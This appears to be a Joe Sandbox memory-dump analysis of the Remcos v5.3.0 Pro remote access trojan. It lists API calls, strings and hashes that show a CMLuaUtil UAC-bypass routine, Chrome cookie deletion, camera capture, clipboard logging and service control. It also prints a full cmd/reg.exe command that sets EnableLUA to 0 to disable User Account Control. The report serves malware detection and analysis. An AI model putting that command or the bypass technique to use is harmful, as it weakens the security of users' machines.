                                                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                        • API String ID: 3851391207-3324213274
                                                                                                        • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                                        • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                                                                        • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                                        • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                                                                        APIs
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                                                                        • int.LIBCPMT ref: 0040FEF2
                                                                                                          • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                          • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                        • String ID: H]G
                                                                                                        • API String ID: 2536120697-1717957184
                                                                                                        • Opcode ID: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                                                        • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                                                                                                        • Opcode Fuzzy Hash: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                                                        • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                                                                                                        APIs
                                                                                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                                                        • GetLastError.KERNEL32 ref: 0040B2EE
                                                                                                        Strings
                                                                                                        • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                                                        • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                                                        • [Chrome Cookies not found], xrefs: 0040B308
                                                                                                        • UserProfile, xrefs: 0040B2B4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DeleteErrorFileLast
                                                                                                        • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                        • API String ID: 2018770650-304995407
                                                                                                        • Opcode ID: ec592ed9ccf4b9a5ae27431b7db5c03baafcaff9f2a5fd094053063a907b4898
                                                                                                        • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                                                                                                        • Opcode Fuzzy Hash: ec592ed9ccf4b9a5ae27431b7db5c03baafcaff9f2a5fd094053063a907b4898
                                                                                                        • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
                                                                                                        APIs
                                                                                                        • AllocConsole.KERNEL32(00474358), ref: 0041BEB9
                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                                                                                                        • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Console$AllocOutputShowWindow
                                                                                                        • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                                                                        • API String ID: 2425139147-2527699604
                                                                                                        • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                                        • Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
                                                                                                        • Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                                        • Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
                                                                                                        Strings
                                                                                                        • BG, xrefs: 00406909
                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, xrefs: 00406927
                                                                                                        • (CG, xrefs: 0040693F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$BG
                                                                                                        • API String ID: 0-1344005379
                                                                                                        • Opcode ID: b7a2e59ac2a9b4cfd69ae58ffa53ef09c4b6135ca76893af750d01e39a00b3fe
                                                                                                        • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                                                                        • Opcode Fuzzy Hash: b7a2e59ac2a9b4cfd69ae58ffa53ef09c4b6135ca76893af750d01e39a00b3fe
                                                                                                        • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                                                                        APIs
                                                                                                        • __allrem.LIBCMT ref: 00439789
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                                                                        • __allrem.LIBCMT ref: 004397BC
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                                                                        • __allrem.LIBCMT ref: 004397F1
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                        • String ID:
                                                                                                        • API String ID: 1992179935-0
                                                                                                        • Opcode ID: 088a2e1066119da7e611ebb0c50ba568729b81e5e50e163a33f94ab824c18df8
                                                                                                        • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                                                                        • Opcode Fuzzy Hash: 088a2e1066119da7e611ebb0c50ba568729b81e5e50e163a33f94ab824c18df8
                                                                                                        • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __cftoe
                                                                                                        • String ID:
                                                                                                        • API String ID: 4189289331-0
                                                                                                        • Opcode ID: 20c88ef437a120485069e82cad4792bbc61779312f3e169af31805832c4ed2ab
                                                                                                        • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                                                                        • Opcode Fuzzy Hash: 20c88ef437a120485069e82cad4792bbc61779312f3e169af31805832c4ed2ab
                                                                                                        • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __freea$__alloca_probe_16
                                                                                                        • String ID: a/p$am/pm
                                                                                                        • API String ID: 3509577899-3206640213
                                                                                                        • Opcode ID: d47145a3bc1b7d9653af932916ed6ede224238620767b4a39004040ccf91a16a
                                                                                                        • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                                                                                                        • Opcode Fuzzy Hash: d47145a3bc1b7d9653af932916ed6ede224238620767b4a39004040ccf91a16a
                                                                                                        • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                                                                                                        APIs
                                                                                                        • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                                                                          • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        • API ID: H_prologSleep
                                                                                                        • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                                                                        • API String ID: 3469354165-462540288
                                                                                                        • Opcode ID: 25a0f4193d6ce9d903107b1be8cfd58e430ba9181b3007ec8c1f7c1118c42728
                                                                                                        • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                                                                                                        • Opcode Fuzzy Hash: 25a0f4193d6ce9d903107b1be8cfd58e430ba9181b3007ec8c1f7c1118c42728
                                                                                                        • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                                                                                                        APIs
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                                                                                                        • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                        • String ID:
                                                                                                        • API String ID: 493672254-0
                                                                                                        • Opcode ID: cc75d9dcd9698d489bd16d1529218808ef0209595e5e3940521ea5438231db37
                                                                                                        • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                                                                        • Opcode Fuzzy Hash: cc75d9dcd9698d489bd16d1529218808ef0209595e5e3940521ea5438231db37
                                                                                                        • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                                                                                                        • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                        • String ID:
                                                                                                        • API String ID: 3852720340-0
                                                                                                        • Opcode ID: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                                                                                        • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                                                                                                        • Opcode Fuzzy Hash: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                                                                                        • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                        • _free.LIBCMT ref: 00446EF6
                                                                                                        • _free.LIBCMT ref: 00446F1E
                                                                                                        • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                        • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                        • _abort.LIBCMT ref: 00446F3D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                        • String ID:
                                                                                                        • API String ID: 3160817290-0
                                                                                                        • Opcode ID: ee081b98001fac20135d606adf3ebd9ed25e83f06873042332f69cc5cc1fb8f1
                                                                                                        • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                                                                                                        • Opcode Fuzzy Hash: ee081b98001fac20135d606adf3ebd9ed25e83f06873042332f69cc5cc1fb8f1
                                                                                                        • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                                                                                                        APIs
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                        • String ID:
                                                                                                        • API String ID: 221034970-0
                                                                                                        • Opcode ID: 8c2c12d76111034d1ffd754af595e71f441d69217dbef0b08bd463c672326562
                                                                                                        • Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
                                                                                                        • Opcode Fuzzy Hash: 8c2c12d76111034d1ffd754af595e71f441d69217dbef0b08bd463c672326562
                                                                                                        • Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
                                                                                                        APIs
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                                                                                                        • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                        • String ID:
                                                                                                        • API String ID: 221034970-0
                                                                                                        • Opcode ID: d7e55e87c4aa5de171478471ca9946ff37ffda1a29cecfda88707176146ab33a
                                                                                                        • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                                                                                                        • Opcode Fuzzy Hash: d7e55e87c4aa5de171478471ca9946ff37ffda1a29cecfda88707176146ab33a
                                                                                                        • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                                                                                                        APIs
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                                                                                                        • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                        • String ID:
                                                                                                        • API String ID: 221034970-0
                                                                                                        • Opcode ID: b25a7e1b6f2a79e6a708b03e077db022cb2e93733ffc263c18ea91644c8a084d
                                                                                                        • Instruction ID: abda6543b9bae7672c93be1b0f3a8a56711a85df89096aceaf06b6c73a90a6e4
                                                                                                        • Opcode Fuzzy Hash: b25a7e1b6f2a79e6a708b03e077db022cb2e93733ffc263c18ea91644c8a084d
                                                                                                        • Instruction Fuzzy Hash: C2F0C2325002146BD2116B24FC49EBF3AACDB45BA1B04003AFA06A21D2DB28CE4685F8
                                                                                                        APIs
                                                                                                        • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        • API ID: Enum$InfoQueryValue
                                                                                                        • String ID: [regsplt]$DG
                                                                                                        • API String ID: 3554306468-1089238109
                                                                                                        • Opcode ID: 668e6125bc102b06f08f4022fce7d3e72e6b7aa882a9d0668b883ab2701ec6ad
                                                                                                        • Instruction ID: 09469598a034e88a10af8fecb22bb8a395a4bc85e225d04bcc93034602455e52
                                                                                                        • Opcode Fuzzy Hash: 668e6125bc102b06f08f4022fce7d3e72e6b7aa882a9d0668b883ab2701ec6ad
                                                                                                        • Instruction Fuzzy Hash: D8512E72108345AFD310EB61D995DEFB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                                                                        APIs
                                                                                                          • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                          • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                          • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                        • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                                                          • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                          • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                                        • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                                                                                                        • API String ID: 2974294136-753205382
                                                                                                        • Opcode ID: 04bb198fbbe4769673077618b9268d4d887794de53c6d81a72813602c084add1
                                                                                                        • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                                                                                                        • Opcode Fuzzy Hash: 04bb198fbbe4769673077618b9268d4d887794de53c6d81a72813602c084add1
                                                                                                        • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                                                                                                        APIs
                                                                                                        • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                                        • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                                        • GetLastError.KERNEL32 ref: 0041CA91
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                        • String ID: 0$MsgWindowClass
                                                                                                        • API String ID: 2877667751-2410386613
                                                                                                        • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                        • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                                                                        • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                                                                        • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
APIs
• CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
• CloseHandle.KERNEL32(?), ref: 00406A0F
• CloseHandle.KERNEL32(?), ref: 00406A14
Strings
• /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
• C:\Windows\System32\cmd.exe, xrefs: 004069FB
• API ID: CloseHandle$CreateProcess
• String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002), ref: 004425F9
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
• FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 0044262F
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
APIs
• RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
• RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
• RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
• API ID: CloseCreateValue
• String ID: pth_unenc$BG
APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,004745A8,00414DB5,00000000,00000000,00000001), ref: 00404AED
• SetEvent.KERNEL32(?), ref: 00404AF9
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404B04
• CloseHandle.KERNEL32(?), ref: 00404B0D
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
• API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
• String ID: KeepAlive | Disabled
APIs
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
• GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
• PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
• Sleep.KERNEL32(00002710), ref: 00419F79
• PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
• API ID: PlaySound$HandleLocalModuleSleepTime
• String ID: Alarm triggered
APIs
• GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
• GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
• SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
• SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
Strings
• ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
• API ID: Console$AttributeText$BufferHandleInfoScreen
• String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
APIs
  • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
• GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
• GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
• HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
• SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
• SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
• API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
APIs
